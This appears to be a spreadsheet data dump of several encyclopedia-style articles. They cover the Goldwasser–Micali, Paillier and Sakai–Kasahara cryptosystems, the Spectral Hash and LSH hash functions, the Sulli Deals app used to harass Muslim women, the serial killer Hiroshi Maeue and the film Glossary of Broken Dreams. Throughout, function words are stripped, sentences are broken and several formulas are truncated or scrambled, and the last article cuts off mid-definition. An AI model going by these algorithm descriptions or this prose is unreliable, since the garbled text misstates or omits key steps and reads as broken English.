encryption performed using probabilistic algorithm, given plaintext produce different ciphertexts time encrypted. this significant advantages, prevents adversary recognizing intercepted messages comparing dictionary known ciphertexts. scheme definition goldwasser–micali consists three algorithms: probabilistic generation algorithm produces public private key, probabilistic encryption algorithm, deterministic decryption algorithm. scheme relies deciding whether given value square given factorization this accomplished using following procedure: compute {\displaystyle x_{p}^{(p-1)/2}\equiv 1{\pmod {p}}} {\displaystyle x_{q}^{(q-1)/2}\equiv 1{\pmod {q}}} quadratic residue generation modulus used encryption generated manner cryptosystem. (see rsa, generation details.) alice generates distinct large prime numbers randomly independently other. alice computes finds non-residue legendre symbols satisfy {\displaystyle \left({\frac {x}{p}}\right)=\left({\frac {x}{q}}\right)=-1} hence jacobi symbol {\displaystyle \left({\frac {x}{n}}\right)} value example found selecting random values testing legendre symbols. (i.e., blum integer), value guaranteed required property.the public consists secret factorization message encryption suppose wishes send message alice: first encodes string bits (m1, ..., mn). every {\displaystyle m_{i}} generates random value {\displaystyle y_{i}} group units modulo {\displaystyle \gcd(y_{i},n)=1} outputs value {\displaystyle c_{i}=y_{i}^{2}x^{m_{i}}{\pmod {n}}} .bob sends ciphertext (c1, ..., cn). message decryption alice receives (c1, ..., cn). recover using following procedure: using prime factorization alice determines whether value quadratic residue; otherwise 1.alice outputs message (m1, ..., mn). security properties there simple reduction breaking cryptosystem problem determining whether random value modulo jacobi symbol quadratic residue. algorithm breaks cryptosystem, determine given value quadratic residue modulo test break cryptosystem using (x,n) public key. non-residue, work properly. however, residue, every "ciphertext" simply random quadratic residue, cannot correct half time. furthermore, problem random self-reducible, ensures given every public secure every public key. cryptosystem homomorphic properties, sense encryptions bits c0c1 encryption {\displaystyle m_{0}\oplus m_{1}} reason, cryptosystem sometimes used complex cryptographic primitives. references goldwasser, micali (1982). "probabilistic encryption play mental poker keeping secret partial information". proc. 14th symposium theory computing: 365–377. doi:10.1145/800070.802212. goldwasser, micali (1984). "probabilistic encryption". journal computer system sciences. (2): 270–299. doi:10.1016/0022-0000(84)90070-9. also blum–goldwasser cryptosystem</t>
  </si>
  <si>
    <t>Sulli Deals</t>
  </si>
  <si>
    <t>"sulli deals" open-source contained photographs personal information muslim women online. filed delhi police national commission women india taking moto cognisance matter july creator student indore, madhya pradesh. january 2022, aumkareshwar thakur, created "defame" muslim women, arrested delhi police. thakur granted bail march court. incident july 2021, several pictures muslim women posted twitter, described "deal day". several accounts spoke app, hosted github "open-source project." after multiple complaints, github took suspended "sullideals" account hosted app.this first time muslim women harassed right-wing social media users. 2021, youtuber named liberal doge "rated pakistani women livestream group anonymous accounts harassed hasiba amin, national convenor congress cell. according analysts, group people behind sulli deals app. however, liberal doge denied connection sulli deals app. reaction commentators described targeted harassment muslim women, taking moto cognizance matter delhi police cyber cell registering section 354-a. targeted women, pilot hina khan, filed separate delhi police section section 66,67 act. shiv sena priyanka chaturvedi wrote minister demanding strict urgent action creators app. addition, across party lines signed letter home minister amit shah seeking redressal.congress shashi tharoor aimim president asaduddin owaisi showed solidarity targeted women assured would pursue case prevent misuse social media. more women-rights activists india released statement seeking action culprits.both github twitter criticized failing prevent harassment muslim women auction fiasco taking quick action sullideals account. november 2021, identity creator still unknown, github refusing share data indian authorities usual crpc notice.on january 2022, delhi police said looking actual creator mlat.on january 2022, united nations special rapporteur minority issues, fernand varennes, said, "minority muslim women india harassed ‘sold’ social media apps, #sullideals, form hate speech, must condemned prosecuted soon occur. human rights minorities need fully equally protected". arrest january 2022, delhi police arrested creator sulli deals, indore, madhya pradesh. aftermath 2022, similar named bulli created auction muslim women, trad group involved. police arrested neeraj bishnoi, engineering student, case. march 2022, niraj bishnoi granted bail court. references</t>
  </si>
  <si>
    <t>Paillier cryptosystem</t>
  </si>
  <si>
    <t>paillier cryptosystem, invented named pascal paillier 1999, probabilistic asymmetric algorithm public cryptography. problem computing n-th residue classes believed computationally difficult. decisional composite residuosity assumption intractability hypothesis upon cryptosystem based. scheme additive homomorphic cryptosystem; means that, given public encryption {\displaystyle m_{1}} {\displaystyle m_{2}} compute encryption {\displaystyle m_{1}+m_{2}} algorithm scheme works follows: generation choose large prime numbers {\displaystyle {\displaystyle randomly independently {\displaystyle \gcd(pq,(p-1)(q-1))=1} this property assured primes equal length. compute {\displaystyle n=pq} {\displaystyle \lambda =\operatorname {lcm} (p-1,q-1)} means least common multiple. select random integer {\displaystyle {\displaystyle g\in \mathbb _{n^{2}}^{*}} ensure {\displaystyle divides order {\displaystyle checking existence following modular multiplicative inverse: {\displaystyle =(l(g^{\lambda }{\bmod {n}}^{2}))^{-1}{\bmod {n}}} ,where function {\displaystyle defined {\displaystyle l(x)={\frac {x-1}{n}}} note notation {\displaystyle {\frac {a}{b}}} denote modular multiplication {\displaystyle times modular multiplicative inverse {\displaystyle rather quotient {\displaystyle divided {\displaystyle i.e., largest integer value {\displaystyle v\geq satisfy relation {\displaystyle a\geq .the public (encryption) {\displaystyle (n,g)} private (decryption) {\displaystyle (\lambda ,\mu using equivalent length, simpler variant generation steps would {\displaystyle g=n+1,\lambda =\varphi (n),} {\displaystyle =\varphi (n)^{-1}{\bmod {n}}} {\displaystyle \varphi (n)=(p-1)(q-1)} simpler variant recommended implementational purposes, general form calculation time {\displaystyle high sufficiently large primes p,q. encryption {\displaystyle message encrypted {\displaystyle 0\leq m&lt;n} select random {\displaystyle {\displaystyle 0&lt;r&lt;n} compute ciphertext {\displaystyle c=g^{m}\cdot r^{n}{\bmod {n}}^{2}} decryption {\displaystyle ciphertext decrypt, {\displaystyle c\in \mathbb _{n^{2}}^{*}} compute plaintext message {\displaystyle m=l(c^{\lambda }{\bmod {n}}^{2})\cdot {\bmod {n}}} original paper points out, decryption "essentially exponentiation modulo {\displaystyle n^{2}} homomorphic properties notable feature paillier cryptosystem homomorphic properties along non-deterministic encryption (see electronic voting applications usage). encryption function additively homomorphic, following identities described: homomorphic addition plaintextsthe product ciphertexts decrypt corresponding plaintexts, {\displaystyle d(e(m_{1},r_{1})\cdot e(m_{2},r_{2}){\bmod {n}}^{2})=m_{1}+m_{2}{\bmod {n}}.\,} product ciphertext plaintext raising {\displaystyle decrypt corresponding plaintexts, {\displaystyle d(e(m_{1},r_{1})\cdot g^{m_{2}}{\bmod {n}}^{2})=m_{1}+m_{2}{\bmod {n}}.\,} homomorphic multiplication plaintextsa ciphertext raised power plaintext decrypt product plaintexts, {\displaystyle d(e(m_{1},r_{1})^{m_{2}}{\bmod {n}}^{2})=m_{1}m_{2}{\bmod {n}},\,} {\displaystyle d(e(m_{2},r_{2})^{m_{1}}{\bmod {n}}^{2})=m_{1}m_{2}{\bmod {n}}.\,} more generally, ciphertext raised constant decrypt product plaintext constant, {\displaystyle d(e(m_{1},r_{1})^{k}{\bmod {n}}^{2})=km_{1}{\bmod {n}}.\,} however, given paillier encryptions messages known compute encryption product messages without knowing private key. background paillier cryptosystem exploits fact certain discrete logarithms computed easily. example, binomial theorem, higher powers {\displaystyle (1+n)^{x}=\sum _{k=0}^{x}{x \choose k}n^{k}=1+nx+{x \choose 2}n^{2}+{\text{higher powers }}n} this indicates that: {\displaystyle (1+n)^{x}\equiv 1+nx{\pmod {n^{2}}}} therefore, {\displaystyle y=(1+n)^{x}{\bmod {n}}^{2}} {\displaystyle x\equiv {\frac {y-1}{n}}{\pmod {n}}} .thus: {\displaystyle l((1+n)^{x}{\bmod {n}}^{2})\equiv x{\pmod {n}}} function {\displaystyle defined {\displaystyle l(u)={\frac {u-1}{n}}} (quotient integer division) {\displaystyle x\in \mathbb _{n}} semantic security original cryptosystem shown provide semantic security chosen-plaintext attacks (ind-cpa). ability successfully distinguish challenge ciphertext essentially amounts ability decide composite residuosity. so-called decisional composite residuosity assumption (dcra) believed intractable. because aforementioned homomorphic properties however, system malleable, therefore enjoy highest level semantic security, protection adaptive chosen-ciphertext attacks (ind-cca2). usually cryptography notion malleability seen "advantage," certain applications secure electronic voting threshold cryptosystems, property indeed necessary. paillier pointcheval however went propose improved cryptosystem incorporates combined hashing message random similar intent cramer–shoup cryptosystem, hashing prevents attacker, given able change meaningful way. through adaptation improved scheme shown ind-cca2 secure random oracle model. applications electronic voting semantic security consideration. there situations malleability desirable. homomorphic properties utilized secure electronic voting systems. consider simple binary ("for" "against") vote. voters cast vote either (for) (against). each voter encrypts choice casting vote. election official takes product encrypted votes decrypts result obtains value votes. election official knows people voted people voted against. role random ensures equivalent votes encrypt value negligible likelihood, hence ensuring voter privacy. electronic cash another feature named paper notion self-blinding. this ability change ciphertext another without changing content decryption. this application development ecash, effort originally spearheaded david chaum. imagine paying item online without vendor needing know credit card number, hence identity. goal electronic cash electronic voting, ensure e-coin (likewise e-vote) valid, time disclosing identity person currently associated. threshold cryptosystem homomorphic property paillier cryptosystem sometime used build threshold ecdsa signature. also naccache–stern cryptosystem okamoto–uchiyama cryptosystem historical antecedents paillier. damgård–jurik cryptosystem generalization paillier. references</t>
  </si>
  <si>
    <t>Hiroshi Maeue</t>
  </si>
  <si>
    <t>hiroshi maeue maeue hiroshi, august 1968 july 2009) japanese serial killer lured victims internet killed three people 2005. also known "suicide website murderer", maeue suffered paraphilic psychosexual disorder translated unable achieve sexual release absence performing strangulation. earlier crimes maeue attended kanazawa institute technology, 1988 attempted strangle male friend, resulting dropping out. 1995, arrested charged assault beating attempting asphyxiate male work associate. after settling court, released fired job. 2001, arrested attempted strangling women sentenced year prison years suspended sentence. after released early good behavior, arrested 2002 attempting strangle junior high school boy, sentenced months prison. suicide website murders 2005, soon release prison, murdered three people. convicted killing 14-year-old boy, 25-year-old woman, 21-year-old man, members online suicide club. lured victims suggesting meet lives together committing suicide carbon monoxide poisoning using charcoal burner sealed car. however, brief conversation, would instead strangle them. later said murders gave sexual pleasure, claimed developed desire kill reading similar events mystery novel child. trial death trial, prosecutors called maeue "lust murderer". march 2007, osaka district court sentenced death. although defence team launched appeal, accepted judgment court expressed willingness crimes life, retracting appeal july 2007.on july 2009, maeue hanged osaka, along 25-year-old serial killer yukio yamaji. also erotic asphyxiation internet homicide list executions japan list serial killers country references external links alleged killer linked suicide site. japan times, august 2005. fake suicide pacts. sydney morning herald, august 2005. japanese suicide pact murderer hang. register, march 2007. death sentence. shanghai daily, march 2007. suicide website murders japanese)</t>
  </si>
  <si>
    <t>Glossary of Broken Dreams</t>
  </si>
  <si>
    <t>glossary broken dreams 2018 austrian/american documentary film directed johannes grenzfurthner. essayistic feature film tries present overview political concepts freedom, privacy, identity, resistance, etc.grenzfurthner calls project "ideotaining cinematic revue" political ideas considers important. grenzfurthner cites frustration current level political debate primary influence making film. tolerate "ignorant topically abusive comments 'internet' anymore." teamed writer activist ishan raval "explain, re-evaluate, sometimes sacrifice political golden calves discourse."the film features performances amber benson, grodenchik, jason scott sadofsky others. film produced group monochrom. concept johannes grenzfurthner, defines 'lumpennerd' film's intro, functions storyteller host guides viewer narrative. glossary broken dreams make classic documentary-style interviews aesthetics. instead, film presents different political philosophical concepts form short films essayistic chapters featuring fictional characters. these bizarre exaggerated characters performed actors, voice performers musicians (for example fm4's hannes duscher roland gratzer). film seen tradition reflexive documentary films performative documentary films.in interview film threat, grenzfurthner describes project follows: it's peculiar film nerds peculiar interests, time talking topics goddamn important people know guess that's made idea even target audience try. there process. meme drunk masses probably even scratch surface. idea was: better challenge audience dumb down. film incorporates illustrations bonni rambatan, matt frith, james brothwell, clemens kindermann, stevyn prothero steve reeder variety different cinematic styles. film thus works fast-paced collage, utilizing singer-songwriter duo, puppet shows, lucasarts-style pixel animation, japanese anime, live action sequences stock footage.glossary broken dreams considered loose follow-up grenzfurthner's first documentary feature traceroute, expanding critique capitalist (nerd) culture.austrian german media personalities stefanie sargnagel, gerald votava, peter hörmanseder, katharina stemberger jolyne schlien schürmann make cameo appearances film. chapters production process basic script written johannes grenzfurthner ishan raval, supported language consultant chris sims. fast production process, different chapters written parts already shot edited. final decisions length content made editing room. basis [the theoretical texts], went develop characters plot movie started filming actors. time, cutting scenes finished started movie timeline together. everything happening simultaneously. compiling, writing, filming, cutting. sometimes even order. felt like creating jigsaw puzzle trying solve time. short time production took months doable without losing track completely. principal photography commenced august 2017, ended november 2017. film completed january 2018. with budget us$15,000, film considered microfilmmaking guerrilla filmmaking. interview futurezone, grenzfurthner called making film ongoing process "radical diy". worked different teams people different chapters, example la-based filmmakers sophia cacciola michael epstein, visiting vienna residency monochrom museumsquartier.the film's main language english, features various musical interludes duscher&amp;gratzer music groups, performed german. sound design daniel hasibar created sound design audioscape underlying grenzfurthner's narration. music film features music michael donaldson, inti-illimani, wobblersound, kasson crooker, duscher&amp;gratzer, bottervogel, christoph burstup weiss, among others. distribution film's world premiere took place diagonale film festival graz, austria march 2018. festival called "popcultural wholesale assault". north american premiere took place vermont international film festival april 2018.grenzfurthner proactive approach peer-to-peer file sharing. interview boing boing mentions donation info film, anticipating appearance torrent sites.the film released january 2019 vimeo demand bought rented. reception critical response boing boing says film: "produced micro-budget, monumental mosaic taking audience ride encyclopedia overused, misconceived, corrupted concepts ideas. fact concerns favorite vocabulary current discourses, golden calves contemporary controversy, makes considerably explosive force." austrian culture magazine skug calls film swan song society ignorance.".the independent critic's richard propes states "glossary broken dreams nerdgasm creative consciousness meets good intentions abundant doses intellectually informed human compassion. it'll fuck mind. then laugh." film threat's bradley gibson says "aggressive, pull punches, burns ideas machine-gun rate head-spinning minutes core dump rage frustration also entertaining witty."austrian magazine profil calls brilliant feat". gaming film website press play says "sometimes feels entire content wikipedia would rammed brain stick." screencritix (uk) writes: "grenzfurthner guide political minefield, giving notes like angry chorus ancient greek shakespearean plays unmethodical survey gargantuan topic."celebbeat writes: "the movie delivered many levels expected possible. potential break echo chambers filter bubbles; empower people providing deeper understanding human condition." "it's really hard deny expert movie pieced together. it's match party epic proportions. school video game graphics. puppets. musicians, anime, kitchen sink. there's shortage style importantly, somehow things co-exist seemingly perfect harmony." rdtb says: slavoj zizek would create kinder surprise eggs, film would them." film review's annie vincent says film: highly intelligent topical film, glossary broken dreams engaging epistemological documentary chuckling about, choking considering validity political ideology." microfilmmaker magazine likes "uncompromising attitude" "unique taste", questions experimental nature film accessibility: real-world interviews conducted camera, surprised since bread butter many documentaries. narrative film? documentary? both?"film inquiry gave negative review called film "exhausting, maddening experience" 405's leorne states: "glossary broken dreams would proper commedia tragic cleverly plays classifications, either juxtaposing simply interchanging them, thus contributing ultimate proof non-existence binaries."in september 2018 issue kinomagazin, oliver stangl gives film positive review calls crazy survey present situation". awards film award merit feature film 2018 accolade global film competition documentary feature 2018 indiefest. best experimental film 2018 subversive cinema awards, best feature documentary foreign 2018 indie gathering awards, best hacker film 2018 hope conference, award merit feature documentary 2018 impact awards, main award (best feature length film) austrian film festival awards 2018. references external links glossary broken dreams imdb official homepage film trailer</t>
  </si>
  <si>
    <t>Spectral Hash</t>
  </si>
  <si>
    <t>spectral hash cryptographic hash function submitted nist hash function competition gokay saldamlı, cevahir demirkıran, megan maguire, carl minden, jacob topper, alex troesch, cody walker, çetin kaya koç. uses merkle–damgård construction employs several mathematical structures including finite fields discrete fourier transforms. authors claim 512-bit hashes 51.2 gigabits second 100-mhz virtex-4 fpga. spectral hash insecure; method exists generate arbitrary collisions hash state, therefore final hash digest. also blake grøstl (knudsen al.) keccak (keccak team, daemen al.) skein (schneier al.) references external links spectral hash site</t>
  </si>
  <si>
    <t>Sakai–Kasahara scheme</t>
  </si>
  <si>
    <t>sakai–kasahara scheme, also known sakai–kasahara encryption algorithm (sakke), identity-based encryption (ibe) system proposed ryuichi sakai masao kasahara 2003. alongside boneh–franklin scheme, small number commercially implemented identity-based encryption schemes. application pairings elliptic curves finite fields. security proof algorithm produced 2005 chen cheng. sakke described internet engineering task force (ietf) 6508.as specific method identity-based encryption, primary case allow anyone encrypt message user sender knows public identity (e.g. email address) user. way, scheme removes requirement users share public certificates purpose encryption. description scheme sakai–kasahara scheme allows encryption message {\displaystyle \mathbb receiver specific identity, {\displaystyle \textstyle i_{u}} only entity private key, {\displaystyle \textstyle k_{u}} associated identity, {\displaystyle \textstyle i_{u}} capable decrypting message. part scheme, sender receiver must trust private generator (pkg), also known management server (kms). purpose create receiver's private key, {\displaystyle \textstyle k_{u}} associated receiver's identity, {\displaystyle \textstyle i_{u}} must securely deliver identity-specific private receiver, pkg-specific public parameter, {\displaystyle \textstyle parties. these distribution processes considered part definition cryptographic scheme. preliminaries scheme uses multiplicative groups {\displaystyle \textstyle {\displaystyle \textstyle assumed: diffie-hellman problem hard {\displaystyle \textstyle meaning given members group {\displaystyle \textstyle {\displaystyle \textstyle hard find {\displaystyle \textstyle {\displaystyle \textstyle [x].p=q} diffie-hellman problem hard {\displaystyle \textstyle meaning given members group {\displaystyle {\displaystyle hard find {\displaystyle \textstyle {\displaystyle \textstyle g^{x}=t} there bilinear map, tate-lichtenbaum pairing, {\displaystyle \textstyle e(,)} this means {\displaystyle \textstyle member {\displaystyle \textstyle {\displaystyle \textstyle e(p,[x].p)=e([x].p,p)=e(p,p)^{x}} frequently, {\displaystyle \textstyle supersingular elliptic curve, {\displaystyle \textstyle e:y^{2}=x^{3}-3x} (over finite field prime order {\displaystyle \textstyle generator {\displaystyle \textstyle prime order {\displaystyle \textstyle chosen {\displaystyle \textstyle group {\displaystyle \textstyle image pairing group generated {\displaystyle \textstyle extension field degree finite field order hash functions also required, {\displaystyle \textstyle h_{1}} {\displaystyle \textstyle h_{2}} {\displaystyle \textstyle h_{1}} outputs positive integer, {\displaystyle \textstyle {\displaystyle \textstyle 1&lt;x&lt;q} {\displaystyle \textstyle h_{2}} outputs {\displaystyle \textstyle bits, {\displaystyle \textstyle length message {\displaystyle \mathbb generation master secret {\displaystyle \textstyle {\displaystyle 1&lt;z&lt;q} public {\displaystyle \textstyle z=[z].p} point {\displaystyle \textstyle generates private key, {\displaystyle \textstyle k_{u}} user identity {\displaystyle \textstyle id_{u}} follows: {\displaystyle \textstyle k_{u}=[{\frac {1}{z+h_{1}(id_{u})}}].p} encryption encrypt non-repeating message {\displaystyle \mathbb sender requires receiver's identity, {\displaystyle \textstyle id_{u}} public value {\displaystyle \textstyle sender performs following operation. create: {\displaystyle \textstyle id=h_{1}(id_{u})} sender generates {\displaystyle \textstyle using {\displaystyle \textstyle r=h_{1}(\mathbb ||id)} generate point {\displaystyle \textstyle {\displaystyle \textstyle {\displaystyle \textstyle r=[r].([id].p+z)} create masked message: {\displaystyle \textstyle s=\mathbb \oplus h_{2}(g^{r})} encrypted output {\displaystyle \textstyle (r,s)} note messages repeat, repeated message identity results repeated ciphertext. there extension protocol messages potentially repeat. decryption decrypt message encrypted {\displaystyle \textstyle id_{u}} receiver requires private key, {\displaystyle \textstyle k_{u}} public value {\displaystyle \textstyle decryption procedure follows: compute {\displaystyle \textstyle id=h_{1}(id_{u})} receive encrypted message: {\displaystyle \textstyle (r,s)} compute: {\displaystyle \textstyle w=e(r,k_{u})} extract message: {\displaystyle \textstyle \mathbb =s\oplus h_{2}(w)} verify message, compute {\displaystyle \textstyle r=h_{1}(\mathbb ||id)} accept message {\displaystyle \textstyle [r].([id].p+z)\equiv demonstration algorithmic correctness following equations demonstrate correctness algorithm: {\displaystyle \textstyle w=e(r,k_{u})=e([r].([id].p+z),k_{u})=e([r].([id].p+[z].p),k_{u})=e([r(id+z)].p,k_{u})} bilinear property map: {\displaystyle \textstyle w=e([r(id+z)].p,k_{u})=e([r(id+z)].p,[{\frac {1}{(id+z)}}].p)=e(p,p)^{\frac {r(id+z)}{(id+z)}}=g^{r}} result: {\displaystyle \textstyle s\oplus h_{2}(w)=(\mathbb \oplus h_{2}(g^{r}))\oplus h_{2}(w)=\mathbb standardisation there four standards relating protocol: initial standardisation scheme begun ieee 2006. scheme standardised ietf 2012 within 6508. key-exchange algorithm based scheme mikey-sakke protocol developed uk's national intelligence security agency, gchq, defined 6509. sakai-kasahara, specified mikey-sakke, core key-exchange algorithm secure chorus encrypted voice standard. security common identity-based encryption schemes, sakai-kasahara requires management server (kms) stores master secret users' private keys generated. steven murdoch criticised mikey-sakke creating security vulnerability allowing decrypt every users' communication. murdoch also noted lack forward secrecy mikey-sakke increases harm could result master secret compromised. gchq, creator mikey-sakke, disputed analysis, pointing organisations consider monitoring capabilities desirable investigative regulatory reasons, protected air-gap. cryptographic libraries implementations scheme part miracl cryptographic library. also id-based encryption wolfssl ssl/tls library integration mikey sakke references</t>
  </si>
  <si>
    <t>LSH (hash function)</t>
  </si>
  <si>
    <t>cryptographic hash function designed 2014 south korea provide integrity general-purpose software environments smart devices. cryptographic algorithms approved korean cryptographic module validation program (kcmvp). national standard south korea 3262). specification overall structure hash function shown following figure. hash function wide-pipe merkle-damgård structure one-zeros padding. message hashing process consists following three stages. initialization: one-zeros padding given string message. conversion 32-word array message blocks padded string message. initialization chaining variable initialization vector. compression: updating chaining variables iteration compression function message blocks. finalization: generation {\displaystyle -bit hash value final chaining variable.the specifications hash function follows. initialization {\displaystyle given string message. given {\displaystyle padded one-zeros, i.e., appended {\displaystyle ‘0’s appended length padded message {\displaystyle 32wt} {\displaystyle t=\lceil (|m|+1)/32w\rceil {\displaystyle \lceil x\rceil smallest integer less {\displaystyle {\displaystyle m_{p}=m_{0}\|m_{1}\|\ldots \|m_{(32wt-1)}} one-zeros-padded {\displaystyle 32wt} -bit string {\displaystyle then {\displaystyle m_{p}} considered {\displaystyle 4wt} -byte array {\displaystyle m_{a}=(m[0],\ldots ,m[4wt-1])} {\displaystyle m[k]=m_{8k}\|m_{(8k+1)}\|\ldots \|m_{(8k+7)}} {\displaystyle 0\leq k\leq (4wt-1)} {\displaystyle 4wt} -byte array {\displaystyle m_{a}} converts {\displaystyle 32t} -word array {\displaystyle {\textsf {m}}=(m[0],\ldots ,m[32t-1])} follows. {\displaystyle m[s]\leftarrow m[ws/8+(w/8-1)]\|\ldots \|m[ws/8+1]\|m[ws/8]} {\displaystyle (0\leq s\leq (32t-1))} from word array {\displaystyle {\textsf {m}}} define {\displaystyle 32-word array message blocks {\displaystyle \{{\textsf {m}}^{(i)}\}_{i=0}^{t-1}} follows. {\displaystyle {\textsf {m}}^{(i)}\leftarrow (m[32i],m[32i+1],\ldots ,m[32i+31])} {\displaystyle (0\leq i\leq (t-1))} 16-word array chaining variable {\displaystyle {\textsf {cv}}^{(0)}} initialized initialization vector {\displaystyle {\textsf {iv}}} {\displaystyle {\textsf {cv}}^{(0)}[l]\leftarrow {\textsf {iv}}[l]} {\displaystyle (0\leq l\leq 15)} initialization vector {\displaystyle {\textsf {iv}}} follows. following tables, values expressed hexadecimal form. compression stage, {\displaystyle 32-word array message blocks {\displaystyle \{{\textsf {m}}^{(i)}\}_{i=0}^{t-1}} generated message {\displaystyle initialization stage, compressed iteration compression functions. compression function {\displaystyle {\textrm {cf}}:{\mathcal {w}}^{16}\times {\mathcal {w}}^{32}\rightarrow {\mathcal {w}}^{16}} inputs; {\displaystyle 16-word chaining variable {\displaystyle {\textsf {cv}}^{(i)}} {\displaystyle 32-word message block {\displaystyle {\textsf {m}}^{(i)}} returns {\displaystyle (i+1)} 16-word chaining variable {\displaystyle {\textsf {cv}}^{(i+1)}} here subsequently, {\displaystyle {\mathcal {w}}^{t}} denotes {\displaystyle -word arrays {\displaystyle t\geq following four functions used compression function: message expansion function msgexp {\displaystyle {\textrm {msgexp}}:{\mathcal {w}}^{32}\rightarrow {\mathcal {w}}^{16(ns+1)}} message addition function msgadd {\displaystyle {\textrm {msgadd}}:{\mathcal {w}}^{16}\times {\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} function {\displaystyle {\textrm {mix}}_{j}:{\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} word-permutation function wordperm {\displaystyle {\textrm {wordperm}}:{\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} overall structure compression function shown following figure. compression function, message expansion function msgexp {\displaystyle {\textrm {msgexp}}} generates {\displaystyle (n_{s}+1)} 16-word array sub-messages {\displaystyle \{{\textsf {m}}_{j}^{(i)}\}_{j=0}^{n_{s}}} given {\displaystyle {\textsf {m}}^{(i)}} {\displaystyle {\textsf {t}}=(t[0],\ldots ,t[15])} temporary 16-word array {\displaystyle chaining variable {\displaystyle {\textsf {cv}}^{(i)}} {\displaystyle step function step {\displaystyle {\textrm {step}}_{j}} inputs {\displaystyle {\textsf {t}}} {\displaystyle {\textsf {m}}_{j}^{(i)}} updates {\displaystyle {\textsf {t}}} i.e., step {\displaystyle {\textsf {t}}\leftarrow {\textrm {step}}_{j}\left({\textsf {t}},{\textsf {m}}_{j}^{(i)}\right)} step functions proceeded order {\displaystyle j=0,\ldots ,n_{s}-1} then msgadd {\displaystyle {\textrm {msgadd}}} operation {\displaystyle {\textsf {m}}_{n_{s}}^{(i)}} proceeded, {\displaystyle (i+1)} chaining variable {\displaystyle {\textsf {cv}}^{(i+1)}} {\displaystyle {\textsf {t}}} process compression function detail follows. here {\displaystyle step function step {\displaystyle {\textrm {step}}_{j}:{\mathcal {w}}^{16}\times {\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} follows. step wordperm msgadd {\displaystyle {\textrm {step}}_{j}:={\textrm {wordperm}}\circ {\textrm {mix}}_{j}\circ {\textrm {msgadd}}} {\displaystyle (0\leq j\leq (n_{s}-1))} following figure shows {\displaystyle step function step {\displaystyle {\textrm {step}}_{j}} compression function. message expansion function msgexp {\displaystyle {\textsf {m}}^{(i)}=(m^{(i)}[0],\ldots ,m^{(i)}[31])} {\displaystyle 32-word array message block. message expansion function msgexp {\displaystyle {\textrm {msgexp}}} generates {\displaystyle (n_{s}+1)} 16-word array sub-messages {\displaystyle \{{\textsf {m}}_{j}^{(i)}\}_{j=0}^{n_{s}}} message block {\displaystyle {\textsf {m}}^{(i)}} first sub-messages {\displaystyle {\textsf {m}}_{0}^{(i)}=(m_{0}^{(i)}[0],\ldots ,m_{0}^{(i)}[15])} {\displaystyle {\textsf {m}}_{1}^{(i)}=(m_{1}^{(i)}[0],\ldots ,m_{1}^{(i)}[15])} defined follows. {\displaystyle {\textsf {m}}_{0}^{(i)}\leftarrow (m^{(i)}[0],m^{(i)}[1],\ldots ,m^{(i)}[15])} {\displaystyle {\textsf {m}}_{1}^{(i)}\leftarrow (m^{(i)}[16],m^{(i)}[17],\ldots ,m^{(i)}[31])} next sub-messages {\displaystyle \{{\textsf {m}}_{j}^{(i)}=(m_{j}^{(i)}[0],\ldots ,m_{j}^{(i)}[15])\}_{j=2}^{n_{s}}} generated follows. {\displaystyle {\textsf {m}}_{j}^{(i)}[l]\leftarrow {\textsf {m}}_{j-1}^{(i)}[l]\boxplus {\textsf {m}}_{j-2}^{(i)}[\tau (l)]} {\displaystyle (0\leq l\leq 15,\ 2\leq j\leq n_{s})} here {\displaystyle \tau permutation {\displaystyle \mathbb _{16}} defined follows. message addition function msgadd 16-word arrays {\displaystyle {\textsf {x}}=(x[0],\ldots ,x[15])} {\displaystyle {\textsf {y}}=(y[0],\ldots ,y[15])} message addition function msgadd {\displaystyle {\textrm {msgadd}}:{\mathcal {w}}^{16}\times {\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} defined follows. msgadd {\displaystyle {\textrm {msgadd}}({\textsf {x}},{\textsf {y}}):=(x[0]\oplus y[0],\ldots ,x[15]\oplus y[15])} function {\displaystyle function {\displaystyle {\textrm {mix}}_{j}:{\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} updates 16-word array {\displaystyle {\textsf {t}}=(t[0],\ldots ,t[15])} mixing every two-word pair; {\displaystyle t[l]} {\displaystyle t[l+8]} {\displaystyle (0\leq l&lt;8)} {\displaystyle 0\leq j&lt;n_{s}} function {\displaystyle {\textrm {mix}}_{j}} proceeds follows. {\displaystyle (t[l],t[l+8])\leftarrow {\textrm {mix}}_{j,l}(t[l],t[l+8])} {\displaystyle (0\leq l&lt;8)} here {\displaystyle {\textrm {mix}}_{j,l}} two-word function. {\displaystyle {\displaystyle words. two-word function {\displaystyle {\textrm {mix}}_{j,l}:{\mathcal {w}}^{2}\rightarrow {\mathcal {w}}^{2}} defined follows. two-word function {\displaystyle {\textrm {mix}}_{j,l}} shown following figure. rotation amounts {\displaystyle \alpha _{j}} {\displaystyle \beta _{j}} {\displaystyle \gamma _{l}} used {\displaystyle {\textrm {mix}}_{j,l}} shown following table. {\displaystyle 8-word array constant {\displaystyle {\textsf {sc}}_{j}=(sc_{j}[0],\ldots ,sc_{j}[7])} used {\displaystyle {\textrm {mix}}_{j,l}} {\displaystyle 0\leq l&lt;8} defined follows. initial 8-word array constant {\displaystyle {\textsf {sc}}_{0}=(sc_{0}[0],\ldots ,sc_{0}[7])} defined following table. {\displaystyle 1\leq j&lt;n_{s}} {\displaystyle constant {\displaystyle {\textsf {sc}}_{j}=(sc_{j}[0],\ldots ,sc_{j}[7])} generated {\displaystyle sc_{j}[l]\leftarrow sc_{j-1}[l]\boxplus sc_{j-1}[l]^{\lll {\displaystyle 0\leq l&lt;8} word-permutation function wordperm {\displaystyle {\textsf {x}}=(x[0],\ldots ,x[15])} 16-word array. word-permutation function wordperm {\displaystyle {\textrm {wordperm}}:{\mathcal {w}}^{16}\rightarrow {\mathcal {w}}^{16}} defined follows. wordperm {\displaystyle {\textrm {wordperm}}({\textsf {x}})=(x[\sigma (0)],\ldots ,x[\sigma (15)])} here {\displaystyle \sigma permutation {\displaystyle \mathbb _{16}} defined following table. finalization finalization function {\displaystyle {\textrm {fin}}_{n}:{\mathcal {w}}^{16}\rightarrow \{0,1\}^{n}} returns {\displaystyle -bit hash value {\displaystyle final chaining variable {\displaystyle {\textsf {cv}}^{(t)}=(cv^{(t)}[0],\ldots ,cv^{(t)}[15])} when {\displaystyle {\textsf {h}}=(h[0],\ldots ,h[7])} 8-word variable {\displaystyle 